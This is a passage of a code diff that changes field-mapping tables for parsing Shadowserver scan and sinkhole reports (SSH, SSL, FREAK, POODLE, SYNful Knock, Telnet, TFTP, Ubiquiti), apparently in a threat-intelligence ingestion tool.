+        ('extra.', 'cache_control', validate_to_none),
+        ('extra.', 'location', validate_to_none),
+        ('extra.', 'server', validate_to_none),
+        ('extra.', 'search_target', validate_to_none),
+        ('extra.', 'unique_service_name', validate_to_none),
+        ('extra.', 'host', validate_to_none),
+        ('extra.', 'nts', validate_to_none),
+        ('extra.', 'nt', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'server_port', validate_to_none),
+        ('extra.', 'instance', validate_to_none),
         ('extra.', 'version', validate_to_none),
-        ('extra.', 'event_id', validate_to_none),
-        ('extra.', 'count', convert_int),
+        ('extra.', 'updated_at', validate_to_none),
+        ('extra.', 'resource_identifier', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'ssdp',
+        'classification.identifier': 'open-ssdp',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-ssh-report/
+scan_ssh = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.', 'serverid_raw', validate_to_none),
+        ('extra.', 'serverid_version', validate_to_none),
+        ('extra.', 'serverid_software', validate_to_none),
+        ('extra.', 'serverid_comment', validate_to_none),
+        ('extra.', 'server_cookie', validate_to_none),
+        ('extra.', 'available_kex', validate_to_none),
+        ('extra.', 'available_ciphers', validate_to_none),
+        ('extra.', 'available_mac', validate_to_none),
+        ('extra.', 'available_compression', validate_to_none),
+        ('extra.', 'selected_kex', validate_to_none),
+        ('extra.', 'algorithm', validate_to_none),
+        ('extra.', 'selected_cipher', validate_to_none),
+        ('extra.', 'selected_mac', validate_to_none),
+        ('extra.', 'selected_compression', validate_to_none),
+        ('extra.', 'server_signature_value', validate_to_none),
+        ('extra.', 'server_signature_raw', validate_to_none),
+        ('extra.', 'server_host_key', validate_to_none),
+        ('extra.', 'server_host_key_sha256', validate_to_none),
+        ('extra.', 'rsa_prime', validate_to_none),
+        ('extra.', 'rsa_prime_length', validate_to_none),
+        ('extra.', 'rsa_generator', validate_to_none),
+        ('extra.', 'rsa_generator_length', validate_to_none),
+        ('extra.', 'rsa_public_key', validate_to_none),
+        ('extra.', 'rsa_public_key_length', validate_to_none),
+        ('extra.', 'rsa_exponent', validate_to_none),
+        ('extra.', 'rsa_modulus', validate_to_none),
+        ('extra.', 'rsa_length', validate_to_none),
+        ('extra.', 'dss_prime', validate_to_none),
+        ('extra.', 'dss_prime_length', validate_to_none),
+        ('extra.', 'dss_generator', validate_to_none),
+        ('extra.', 'dss_generator_length', validate_to_none),
+        ('extra.', 'dss_public_key', validate_to_none),
+        ('extra.', 'dss_public_key_length', validate_to_none),
+        ('extra.', 'dss_dsa_public_g', validate_to_none),
+        ('extra.', 'dss_dsa_public_p', validate_to_none),
+        ('extra.', 'dss_dsa_public_q', validate_to_none),
+        ('extra.', 'dss_dsa_public_y', validate_to_none),
+        ('extra.', 'ecdsa_curve25519', validate_to_none),
+        ('extra.', 'ecdsa_curve', validate_to_none),
+        ('extra.', 'ecdsa_public_key_length', validate_to_none),
+        ('extra.', 'ecdsa_public_key_b', validate_to_none),
+        ('extra.', 'ecdsa_public_key_gx', validate_to_none),
+        ('extra.', 'ecdsa_public_key_gy', validate_to_none),
+        ('extra.', 'ecdsa_public_key_n', validate_to_none),
+        ('extra.', 'ecdsa_public_key_p', validate_to_none),
+        ('extra.', 'ecdsa_public_key_x', validate_to_none),
+        ('extra.', 'ecdsa_public_key_y', validate_to_none),
+        ('extra.', 'ed25519_curve25519', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_nonce', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_bytes', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_raw', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_sha256', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_serial', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_type_id', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_type_name', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_keyid', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_principles', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_valid_after', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_valid_before', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_duration', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_sigkey_bytes', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_sigkey_raw', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_sigkey_sha256', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_sigkey_value', validate_to_none),
+        ('extra.', 'ed25519_cert_public_key_sig_raw', validate_to_none),
+        ('extra.', 'banner', validate_to_none),
+        ('extra.', 'userauth_methods', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_sector', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'classification.identifier': 'open-ssh',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-ssl-report/
+scan_ssl = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'handshake', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'cipher_suite', validate_to_none),
+        ('extra.', 'ssl_poodle', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'subject_organization_name', validate_to_none),
+        ('extra.', 'subject_organization_unit_name', validate_to_none),
+        ('extra.', 'subject_country', validate_to_none),
+        ('extra.', 'subject_state_or_province_name', validate_to_none),
+        ('extra.', 'subject_locality_name', validate_to_none),
+        ('extra.', 'subject_street_address', validate_to_none),
+        ('extra.', 'subject_postal_code', validate_to_none),
+        ('extra.', 'subject_surname', validate_to_none),
+        ('extra.', 'subject_given_name', validate_to_none),
+        ('extra.', 'subject_email_address', validate_to_none),
+        ('extra.', 'subject_business_category', validate_to_none),
+        ('extra.', 'subject_serial_number', validate_to_none),
+        ('extra.', 'issuer_organization_name', validate_to_none),
+        ('extra.', 'issuer_organization_unit_name', validate_to_none),
+        ('extra.', 'issuer_country', validate_to_none),
+        ('extra.', 'issuer_state_or_province_name', validate_to_none),
+        ('extra.', 'issuer_locality_name', validate_to_none),
+        ('extra.', 'issuer_street_address', validate_to_none),
+        ('extra.', 'issuer_postal_code', validate_to_none),
+        ('extra.', 'issuer_surname', validate_to_none),
+        ('extra.', 'issuer_given_name', validate_to_none),
+        ('extra.', 'issuer_email_address', validate_to_none),
+        ('extra.', 'issuer_business_category', validate_to_none),
+        ('extra.', 'issuer_serial_number', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.', 'freak_vulnerable', validate_to_none),
+        ('extra.', 'freak_cipher_suite', validate_to_none),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'http_response_type', validate_to_none),
+        ('extra.', 'http_code', convert_int),
+        ('extra.', 'http_reason', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'http_connection', validate_to_none),
+        ('extra.', 'www_authenticate', validate_to_none),
+        ('extra.', 'set_cookie', validate_to_none),
+        ('extra.', 'server_type', validate_to_none),
+        ('extra.', 'content_length', convert_int),
+        ('extra.', 'transfer_encoding', validate_to_none),
+        ('extra.', 'http_date', convert_date),
+        ('extra.', 'cert_valid', convert_bool),
+        ('extra.', 'self_signed', convert_bool),
+        ('extra.', 'cert_expired', convert_bool),
+        ('extra.', 'browser_trusted', validate_to_none),
+        ('extra.', 'validation_level', validate_to_none),
+        ('extra.', 'browser_error', validate_to_none),
+        ('extra.', 'tlsv13_support', validate_to_none),
+        ('extra.', 'tlsv13_cipher', validate_to_none),
+        ('extra.', 'jarm', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'other',
         'classification.type': 'other',
+        'protocol.application': 'https',
+        'classification.identifier': 'open-ssl',
     },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/microsoft-sinkhole-events-report/
-# https://www.shadowserver.org/what-we-do/network-reporting/sinkhole-events-report/
-event46_sinkhole = {
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Ssl-Freak-Scan
+scan_ssl_freak = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src_ip'),
-        ('source.port', 'src_port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('protocol.transport', 'protocol'),
-        ('source.asn', 'src_asn', invalidate_zero),
-        ('source.geolocation.cc', 'src_geo'),
-        ('source.geolocation.region', 'src_region'),
-        ('source.geolocation.city', 'src_city'),
-        ('source.reverse_dns', 'src_hostname'),
-        ('extra.source.naics', 'src_naics', convert_int),
-        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'freak_vulnerable', convert_bool),
+        ('extra.', 'browser_trusted', convert_bool),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'handshake', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'cipher_suite', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'subject_organization_name', validate_to_none),
+        ('extra.', 'subject_organization_unit_name', validate_to_none),
+        ('extra.', 'subject_country', validate_to_none),
+        ('extra.', 'subject_state_or_province_name', validate_to_none),
+        ('extra.', 'subject_locality_name', validate_to_none),
+        ('extra.', 'subject_street_address', validate_to_none),
+        ('extra.', 'subject_postal_code', validate_to_none),
+        ('extra.', 'subject_surname', validate_to_none),
+        ('extra.', 'subject_given_name', validate_to_none),
+        ('extra.', 'subject_email_address', validate_to_none),
+        ('extra.', 'subject_business_category', validate_to_none),
+        ('extra.', 'subject_serial_number', validate_to_none),
+        ('extra.', 'issuer_organization_name', validate_to_none),
+        ('extra.', 'issuer_organization_unit_name', validate_to_none),
+        ('extra.', 'issuer_country', validate_to_none),
+        ('extra.', 'issuer_state_or_province_name', validate_to_none),
+        ('extra.', 'issuer_locality_name', validate_to_none),
+        ('extra.', 'issuer_street_address', validate_to_none),
+        ('extra.', 'issuer_postal_code', validate_to_none),
+        ('extra.', 'issuer_surname', validate_to_none),
+        ('extra.', 'issuer_given_name', validate_to_none),
+        ('extra.', 'issuer_email_address', validate_to_none),
+        ('extra.', 'issuer_business_category', validate_to_none),
+        ('extra.', 'issuer_serial_number', validate_to_none),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'freak_cipher_suite', validate_to_none),
+        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'http_response_type', validate_to_none),
+        ('extra.', 'http_code', convert_int),
+        ('extra.', 'http_reason', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'http_connection', validate_to_none),
+        ('extra.', 'www_authenticate', validate_to_none),
+        ('extra.', 'set_cookie', validate_to_none),
+        ('extra.', 'server_type', validate_to_none),
+        ('extra.', 'content_length', convert_int),
+        ('extra.', 'transfer_encoding', validate_to_none),
+        ('extra.', 'http_date', convert_date),
+        ('extra.', 'cert_valid', convert_bool),
+        ('extra.', 'self_signed', convert_bool),
+        ('extra.', 'cert_expired', convert_bool),
+        ('extra.', 'validation_level', validate_to_none),
+        ('extra.', 'browser_error', validate_to_none),
+        ('extra.', 'tlsv13_support', validate_to_none),
+        ('extra.', 'tlsv13_cipher', validate_to_none),
+        ('extra.', 'raw_cert', validate_to_none),
+        ('extra.', 'raw_cert_chain', validate_to_none),
+        ('extra.', 'jarm', validate_to_none),
         ('extra.', 'device_vendor', validate_to_none),
         ('extra.', 'device_type', validate_to_none),
         ('extra.', 'device_model', validate_to_none),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port'),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.geolocation.region', 'dst_region'),
-        ('destination.geolocation.city', 'dst_city'),
-        ('destination.reverse_dns', 'dst_hostname'),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('malware.name', 'infection'),
-        ('extra.', 'family', validate_to_none),
-        ('classification.identifier', 'tag'),
-        ('extra.', 'application', validate_to_none),
-        ('extra.', 'version', validate_to_none),
-        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_sector', validate_to_none),
+        ('extra.', 'page_sha256fp', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'malicious-code',
-        'classification.type': 'infected-system',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'https',
+        'classification.identifier': 'ssl-freak',
     },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/microsoft-sinkhole-http-events-report/
-# https://www.shadowserver.org/what-we-do/network-reporting/sinkhole-http-events-report/
-event46_sinkhole_http = {
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Ssl-Scan
+scan_ssl_poodle = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src_ip'),
-        ('source.port', 'src_port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('protocol.transport', 'protocol'),
-        ('source.asn', 'src_asn', invalidate_zero),
-        ('source.geolocation.cc', 'src_geo'),
-        ('source.geolocation.region', 'src_region'),
-        ('source.geolocation.city', 'src_city'),
-        ('source.reverse_dns', 'src_hostname'),
-        ('extra.source.naics', 'src_naics', convert_int),
-        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'ssl_poodle', convert_bool),
+        ('extra.', 'browser_trusted', convert_bool),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'handshake', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'cipher_suite', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'subject_organization_name', validate_to_none),
+        ('extra.', 'subject_organization_unit_name', validate_to_none),
+        ('extra.', 'subject_country', validate_to_none),
+        ('extra.', 'subject_state_or_province_name', validate_to_none),
+        ('extra.', 'subject_locality_name', validate_to_none),
+        ('extra.', 'subject_street_address', validate_to_none),
+        ('extra.', 'subject_postal_code', validate_to_none),
+        ('extra.', 'subject_surname', validate_to_none),
+        ('extra.', 'subject_given_name', validate_to_none),
+        ('extra.', 'subject_email_address', validate_to_none),
+        ('extra.', 'subject_business_category', validate_to_none),
+        ('extra.', 'subject_serial_number', validate_to_none),
+        ('extra.', 'issuer_organization_name', validate_to_none),
+        ('extra.', 'issuer_organization_unit_name', validate_to_none),
+        ('extra.', 'issuer_country', validate_to_none),
+        ('extra.', 'issuer_state_or_province_name', validate_to_none),
+        ('extra.', 'issuer_locality_name', validate_to_none),
+        ('extra.', 'issuer_street_address', validate_to_none),
+        ('extra.', 'issuer_postal_code', validate_to_none),
+        ('extra.', 'issuer_surname', validate_to_none),
+        ('extra.', 'issuer_given_name', validate_to_none),
+        ('extra.', 'issuer_email_address', validate_to_none),
+        ('extra.', 'issuer_business_category', validate_to_none),
+        ('extra.', 'issuer_serial_number', validate_to_none),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'http_response_type', validate_to_none),
+        ('extra.', 'http_code', convert_int),
+        ('extra.', 'http_reason', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'http_connection', validate_to_none),
+        ('extra.', 'www_authenticate', validate_to_none),
+        ('extra.', 'set_cookie', validate_to_none),
+        ('extra.', 'server_type', validate_to_none),
+        ('extra.', 'content_length', convert_int),
+        ('extra.', 'transfer_encoding', validate_to_none),
+        ('extra.', 'http_date', convert_date),
+        ('extra.', 'cert_valid', convert_bool),
+        ('extra.', 'self_signed', convert_bool),
+        ('extra.', 'cert_expired', convert_bool),
+        ('extra.', 'validation_level', validate_to_none),
+        ('extra.', 'browser_error', validate_to_none),
+        ('extra.', 'tlsv13_support', validate_to_none),
+        ('extra.', 'tlsv13_cipher', validate_to_none),
+        ('extra.', 'raw_cert', validate_to_none),
+        ('extra.', 'raw_cert_chain', validate_to_none),
+        ('extra.', 'jarm', validate_to_none),
         ('extra.', 'device_vendor', validate_to_none),
         ('extra.', 'device_type', validate_to_none),
         ('extra.', 'device_model', validate_to_none),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port'),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.geolocation.region', 'dst_region'),
-        ('destination.geolocation.city', 'dst_city'),
-        ('destination.reverse_dns', 'dst_hostname'),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('malware.name', 'infection'),
-        ('extra.', 'family', validate_to_none),
-        ('classification.identifier', 'tag'),
-        ('extra.', 'application', validate_to_none),
-        ('extra.', 'version', validate_to_none),
-        ('extra.', 'event_id', validate_to_none),
-        ('destination.url', 'http_url', convert_http_host_and_url, True),
-        ('destination.fqdn', 'http_host', validate_fqdn),
-        ('extra.', 'http_agent', validate_to_none),
-        ('extra.', 'forwarded_by', validate_to_none),
-        ('extra.', 'ssl_cipher', validate_to_none),
-        ('extra.', 'http_referer', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_sector', validate_to_none),
+        ('extra.', 'page_sha256fp', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'malicious-code',
-        'classification.type': 'infected-system',
-        'protocol.application': 'http',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'https',
+        'classification.identifier': 'ssl-poodle',
     },
 }
 
-
-# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-exchange-server-report/
-def scan_exchange_taxonomy(field):
-    if field == 'exchange;webshell':
-        return 'intrusions'
-    return 'vulnerable'
-
-
-def scan_exchange_type(field):
-    if field == 'exchange;webshell':
-        return 'system-compromise'
-    return 'infected-system'
-
-
-def scan_exchange_identifier(field):
-    if field == 'exchange;webshell':
-        return 'exchange-server-webshell'
-    return 'vulnerable-exchange-server'
-
-
-# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-exchange-server-report/
-scan_exchange = {
+# https://www.shadowserver.org/what-we-do/network-reporting/synful-scan-report/
+scan_synfulknock = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'ack_number', convert_int),
+        ('extra.', 'window_size', convert_int),
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        ('extra.', 'tag'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.source.naics', 'naics', convert_int),
-        ('extra.', 'sic', invalidate_zero),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.', 'sequence_number', validate_to_none),
+        ('extra.', 'urgent_pointer', validate_to_none),
+        ('extra.', 'tcp_flags', validate_to_none),
+        ('extra.', 'raw_packet', validate_to_none),
         ('extra.source.sector', 'sector', validate_to_none),
-        ('extra.', 'version', validate_to_none),
-        ('extra.', 'servername', validate_to_none),
-        ('classification.taxonomy', 'tag', scan_exchange_taxonomy),
-        ('classification.type', 'tag', scan_exchange_type),
-        ('classification.identifier', 'tag', scan_exchange_identifier),
     ],
     'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'classification.identifier': 'open-synfulknock',
     },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/sinkhole-http-referer-events-report/
-event46_sinkhole_http_referer = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-telnet-report/
+scan_telnet = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('extra.', 'http_referer_ip', validate_ip),
-        ('extra.', 'http_referer_asn', convert_int),
-        ('extra.', 'http_referer_geo', validate_to_none),
-        ('extra.', 'http_referer_region', validate_to_none),
-        ('extra.', 'http_referer_city', validate_to_none),
-        ('extra.', 'http_referer_hostname', validate_to_none),
-        ('extra.', 'http_referer_naics', invalidate_zero),
-        ('extra.', 'http_referer_sector', validate_to_none),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.geolocation.region', 'dst_region'),
-        ('destination.geolocation.city', 'dst_city'),
-        ('destination.reverse_dns', 'dst_hostname'),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('malware.name', 'infection'),
-        ('extra.', 'family', validate_to_none),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
         ('extra.', 'tag', validate_to_none),
-        ('extra.', 'application', validate_to_none),
-        ('extra.', 'version', validate_to_none),
-        ('extra.', 'event_id', validate_to_none),
-        ('destination.url', 'http_url', convert_http_host_and_url, True),
-        ('destination.fqdn', 'http_host', validate_fqdn),
-        ('extra.', 'http_referer', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'banner', validate_to_none),
     ],
     'constant_fields': {
-        'classification.identifier': 'sinkhole-http-referer',
-        'classification.taxonomy': 'other',
-        'classification.type': 'other',
-    }
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'telnet',
+        'classification.identifier': 'open-telnet',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-smtp-report/
-vulnerable_smtp = {
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-TFTP
+scan_tftp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
         ('source.ip', 'ip', validate_ip),
-        ('source.port', 'port'),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        ('extra.', 'tag'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'banner', validate_to_none),
+        ('extra.', 'opcode', validate_to_none),
+        ('extra.', 'errorcode', validate_to_none),
+        ('extra.', 'error', validate_to_none),
+        ('extra.', 'errormessage', validate_to_none),
+        ('extra.', 'size', convert_int),
     ],
     'constant_fields': {
-        'classification.identifier': 'vulnerable-smtp',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'protocol.application': 'smtp',
-    }
+        'protocol.application': 'tftp',
+        'classification.identifier': 'open-tftp',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-http-scanner-events/
-honeypot_http_scan = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-ubiquiti-report/
+scan_ubiquiti = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src_ip', validate_ip),
-        ('source.port', 'src_port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.asn', 'src_asn', invalidate_zero),
-        ('source.geolocation.cc', 'src_geo'),
-        ('source.geolocation.region', 'src_region'),
-        ('source.geolocation.city', 'src_city'),
-        ('source.reverse_dns', 'src_hostname'),
-        ('extra.source.naics', 'src_naics', invalidate_zero),
-        ('extra.source.sector', 'src_sector', validate_to_none),
-        ('extra.', 'device_vendor', validate_to_none),
-        ('extra.', 'device_type', validate_to_none),
-        ('extra.', 'device_model', validate_to_none),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port'),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.geolocation.region', 'dst_region'),
-        ('destination.geolocation.city', 'dst_city'),
-        ('destination.reverse_dns', 'dst_hostname'),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('malware.name', 'infection'),
-        ('extra.', 'family', validate_to_none),
+        ('extra.mac_address', 'mac', validate_to_none),
+        ('extra.radio_name', 'radioname', validate_to_none),
+        ('extra.model', 'modelshort', validate_to_none),
+        ('extra.model_full', 'modelfull', validate_to_none),
+        ('extra.firmwarerev', 'firmware', validate_to_none),
+        ('extra.response_size', 'size', convert_int),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
         ('extra.', 'tag', validate_to_none),
-        ('extra.', 'application', validate_to_none),
-        ('extra.', 'version', validate_to_none),
-        ('extra.', 'event_id', validate_to_none),
-        ('extra.', 'pattern', validate_to_none),
-        ('destination.url', 'http_url', convert_http_host_and_url, True),
-        ('user_agent', 'http_agent', validate_to_none),
-        ('extra.method', 'http_request_method', validate_to_none),
-        ('extra.', 'url_scheme', validate_to_none),
-        ('extra.', 'session_tags', validate_to_none),
-        ('extra.', 'vulnerability_enum', validate_to_none),
-        ('extra.', 'vulnerability_id', validate_to_none),
-        ('extra.', 'vulnerability_class', validate_to_none),
-        ('extra.', 'vulnerability_score', validate_to_none),
-        ('extra.', 'vulnerability_severity', validate_to_none),
